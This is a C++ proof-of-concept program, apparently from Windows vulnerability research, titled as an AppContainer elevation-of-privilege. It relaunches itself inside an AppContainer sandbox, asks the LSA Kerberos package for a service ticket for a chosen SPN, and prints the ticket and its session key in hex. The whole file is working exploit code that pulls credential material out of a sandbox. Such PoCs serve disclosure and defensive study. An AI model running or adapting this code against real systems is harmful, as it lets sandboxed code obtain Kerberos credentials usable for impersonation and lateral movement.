// PoC_KerberosTicketRequest_AC_EoP.cpp : This file contains the 'main' function. Program execution begins and ends there.
//

#include <windows.h>
#include <ntsecapi.h>
#include <userenv.h>
#include <stdio.h>
#include <string>
#include <vector>
#include <strsafe.h>
#include <stdarg.h>

#pragma comment(lib, "Userenv.lib")
#pragma comment(lib, "Secur32.lib")
#pragma comment(lib, "Crypt32.lib")

DECLSPEC_NORETURN void ErrorExit(const char* lpFormat, ...)
{
    CHAR buf[1024];
    va_list va;

    va_start(va, lpFormat);
    StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);
    printf("[ERROR] %s\n", buf);

    ExitProcess(1);
}

void PrintInfo(const char* lpFormat, ...)
{
    CHAR buf[1024];
    va_list va;

    va_start(va, lpFormat);
    StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);
    printf("[INFO] %s\n", buf);
}

constexpr wchar_t PROFILE_NAME[] = L"TestAppContainerForApp";

PSID GetAppContainerSid()
{
    PSID sid = nullptr;
    HRESULT hr = CreateAppContainerProfile(PROFILE_NAME, L"DisplayName", L"Description", nullptr, 0, &sid);
    if (SUCCEEDED(hr))
    {
        return sid;
    }
    if (hr != HRESULT_FROM_WIN32(ERROR_ALREADY_EXISTS))
    {
        ErrorExit("Error creating appcontainer profile: %08X", hr);
    }
    hr = DeriveAppContainerSidFromAppContainerName(PROFILE_NAME, &sid);
    if (FAILED(hr))
    {
        ErrorExit("Error deriving appcontainer SID: %08X", hr);
    }
    return sid;
}

bool IsInAppContainer()
{
    DWORD value = 0;
    DWORD length = 0;
    if (!GetTokenInformation(GetCurrentProcessToken(), TokenIsAppContainer, &value, sizeof(value), &length))
    {
        ErrorExit("Error getting token information: %d", GetLastError());
    }

    return !!value;
}

std::wstring GetProcessPath()
{
    WCHAR buffer[MAX_PATH];
    GetModuleFileName(nullptr, buffer, MAX_PATH);
    return buffer;
}

std::wstring GetUnicodeString(UNICODE_STRING& ustr)
{
    if (ustr.Length == 0 || ustr.Buffer == nullptr)
        return L"";
    return std::wstring(ustr.Buffer, ustr.Length / sizeof(wchar_t));
}

std::wstring GetKerberosName(PKERB_EXTERNAL_NAME name)
{
    if (name->NameCount == 0)
        return L"";
    std::wstring ret;
    for (USHORT i = 0; i < name->NameCount - 1; ++i)
    {
        ret += GetUnicodeString(name->Names[i]);
        ret += L"/";
    }
    ret += GetUnicodeString(name->Names[name->NameCount - 1]);
    return ret;
}

std::vector<char> CreateAttributeList()
{
    SIZE_T size = 0;
    (void)InitializeProcThreadAttributeList(nullptr, 1, 0, &size);
    std::vector<char> v(size);
    auto list = reinterpret_cast<LPPROC_THREAD_ATTRIBUTE_LIST>(v.data());
    if (!InitializeProcThreadAttributeList(list, 1, 0, &size))
    {
        ErrorExit("Error initializing proc thread attribute list: %d", GetLastError());
    }
    return v;
}

std::string GetHexKey(KERB_CRYPTO_KEY& key)
{
    DWORD str_size = 0;
    (void)CryptBinaryToStringA(key.Value, key.Length, CRYPT_STRING_HEX | CRYPT_STRING_NOCRLF, nullptr, &str_size);
    std::vector<char> v(str_size);
    if (!CryptBinaryToStringA(key.Value, key.Length, CRYPT_STRING_HEX | CRYPT_STRING_NOCRLF, v.data(), &str_size))
    {
        ErrorExit("Error converting key to hex: %d", GetLastError());
    }
    return v.data();
}

void RestartProcessInAppContainer()
{
    std::vector<char> list_vector = CreateAttributeList();
    STARTUPINFOEX start_info = {};
    start_info.StartupInfo.cb = sizeof(start_info);
    start_info.lpAttributeList = reinterpret_cast<LPPROC_THREAD_ATTRIBUTE_LIST>(list_vector.data());;
    SECURITY_CAPABILITIES caps = {};
    caps.AppContainerSid = GetAppContainerSid();
    if (!UpdateProcThreadAttribute(start_info.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_SECURITY_CAPABILITIES, &caps, sizeof(caps), nullptr, nullptr))
    {
        ErrorExit("Error initializing appcontainer attribute: %d", GetLastError());
    }

    PROCESS_INFORMATION proc_info = {};

    if (!CreateProcess(GetProcessPath().c_str(), GetCommandLine(),
        nullptr, nullptr, FALSE, EXTENDED_STARTUPINFO_PRESENT, 
        nullptr, nullptr, &start_info.StartupInfo, &proc_info))
    {
        ErrorExit("Error creating process: %d", GetLastError());
    }

    CloseHandle(proc_info.hThread);
    (void)WaitForSingleObject(proc_info.hProcess, INFINITE);
    CloseHandle(proc_info.hProcess);
}

void CreateKerberosTicket(wchar_t* spn)
{
    PrintInfo("Creating Kerberos Ticket for SPN %ls", spn);
    HANDLE lsa = nullptr;
    NTSTATUS status = LsaConnectUntrusted(&lsa);
    if (status < 0)
    {
        ErrorExit("Error getting handle to LSA: %08X", status);
    }
    LSA_STRING name = {};
    CHAR package_buffer[] = MICROSOFT_KERBEROS_NAME_A;
    name.Buffer = package_buffer;
    name.Length = (USHORT)strlen(package_buffer);
    name.MaximumLength = name.Length + 1;
    ULONG auth_package = 0;
    status = LsaLookupAuthenticationPackage(lsa, &name, &auth_package);
    if (status < 0)
    {
        ErrorExit("Error getting Kerberos package ID: %08X", status);
    }
    PrintInfo("Got Kerberos package ID: %u", auth_package);

    size_t spn_length = wcslen(spn) * sizeof(wchar_t);
    std::vector<char> req_buffer(sizeof(KERB_RETRIEVE_TKT_REQUEST) + spn_length + sizeof(wchar_t));
    void* target_name = req_buffer.data() + sizeof(KERB_RETRIEVE_TKT_REQUEST);
    memcpy(target_name, spn, spn_length);

    PKERB_RETRIEVE_TKT_REQUEST req = reinterpret_cast<PKERB_RETRIEVE_TKT_REQUEST>(req_buffer.data());
    req->MessageType = KerbRetrieveEncodedTicketMessage;
    req->TargetName.Buffer = static_cast<wchar_t*>(target_name);
    req->TargetName.Length = (USHORT)spn_length;
    req->TargetName.MaximumLength = req->TargetName.Length + sizeof(wchar_t);

    PVOID rep_buffer = nullptr;
    ULONG rep_length = 0;
    NTSTATUS protocol_status = 0;
    status = LsaCallAuthenticationPackage(lsa, auth_package, req, (ULONG)req_buffer.size(), &rep_buffer, &rep_length, &protocol_status);
    if (status < 0)
    {
        ErrorExit("Error calling LSA: %08X", status);
    }

    if (protocol_status < 0)
    {
        ErrorExit("Error calling Kerberos package: %08X", protocol_status);
    }

    PKERB_RETRIEVE_TKT_RESPONSE rep = static_cast<PKERB_RETRIEVE_TKT_RESPONSE>(rep_buffer);
    if (!rep)
    {
        ErrorExit("Invalid returned buffer.");
    }
    KERB_EXTERNAL_TICKET& ticket = rep->Ticket;
    PrintInfo("Got Kerberos Service Ticket Buffer %p - Length %u", ticket.EncodedTicket, ticket.EncodedTicketSize);
    PrintInfo("Service Name: %ls", GetKerberosName(ticket.ServiceName).c_str());
    PrintInfo("Target Name: %ls", GetKerberosName(ticket.TargetName).c_str());
    PrintInfo("Client Name: %ls", GetKerberosName(ticket.ClientName).c_str());
    PrintInfo("Session Key Type: %u", ticket.SessionKey.KeyType);
    PrintInfo("Session Key: %s", GetHexKey(ticket.SessionKey).c_str());
}

int wmain(int argc, wchar_t** argv)
{
    if (argc < 2)
    {
        ErrorExit("Specify an SPN for the ticket.");
    }

    if (!IsInAppContainer())
    {
        RestartProcessInAppContainer();
    }
    else
    {
        PrintInfo("In AppContainer");
        CreateKerberosTicket(argv[1]);
    }
    return 0;
}